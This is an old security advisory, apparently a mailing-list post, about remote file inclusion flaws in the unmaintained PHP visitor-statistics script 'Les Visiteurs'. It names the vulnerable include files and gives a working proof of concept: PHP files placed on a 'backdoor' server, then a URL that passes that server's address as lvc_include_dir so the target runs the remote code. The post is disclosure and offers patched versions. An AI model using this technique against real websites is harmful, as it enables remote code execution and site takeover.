Les Visiteurs is a great statistics script written in php.

It gives you some graphicals informations on visitors of

your website.

This script was distributed by phpinfo.net but is no more

maintained since a year.

---------

In this version severals unprotected includes can be found

in files:

- include/config.inc.php

- include/new-visitor.inc.php

It is possible to include a php file from a backdoor server,

and execute it on the target's server.

You just have to create on the backdoor srv these files:

- lang/<lang>.inc.php

- db/db_mysql.inc.php

fill one with something like:

<?

echo '<?

echo "<br><br>included from backdoor server :p<br>";

?>';

?>

and call an url as:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/

---------

Because the script is not maintained and will not be patched,

i make some tarballs with a patched version.

You will find it at this url:

http://chezwam.net/main/publications/lesvisiteurs/

Matthieu Peschaud

Epita - France

[ reply ]